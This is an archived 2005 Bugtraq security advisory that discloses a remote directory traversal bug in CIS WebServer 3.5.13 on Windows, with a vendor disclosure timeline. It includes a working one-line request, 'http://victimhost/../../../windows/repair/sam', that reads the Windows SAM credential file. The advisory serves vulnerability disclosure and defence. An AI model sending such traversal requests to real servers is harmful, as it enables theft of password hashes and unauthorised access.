CIS WebServer Directory Traversal Bug
From: CorryL (corryl_at_sitoverde.com)
Date: 02/25/05
- Previous message: Eric McCarty: "RE: Firescrolling [Firefox 1.0]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "bugtraq" <bugtraq@securityfocus.com> Date: Fri, 25 Feb 2005 18:31:34 +0100
-=[ x0n3-h4ck Italian Security Team ]=-
/*Advisories*\
/*
Application: CIS WebServer
Vendor's Url: www.cisindia.net
Version: 3.5.13
Platforms: Windows
Bug: Directory Traversal
Exploitation: Remote
Author: CorryL
corryl80@gmail.com
www.x0n3-h4ck.org
*\
{Description}
CIS WebServer is an easy http server, A remote user can obtain files on the
system that are located outside of
the web document directory.
{Bug}
http://victimhost/../../../windows/repair/sam
A remote user succeds to read the file sam of the system where CIS WebServer
is running
{Vendor Status}
20/02/2005 Vendor notification
21/02/2005 Vendor Response
25/02/2005 No patch relase from vendor
25/02/2005 Public disclousure
{Fix}
Waiting for an official patch
_________________________________
www.seekstat.it is your web stat
- Previous message: Eric McCarty: "RE: Firescrolling [Firefox 1.0]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
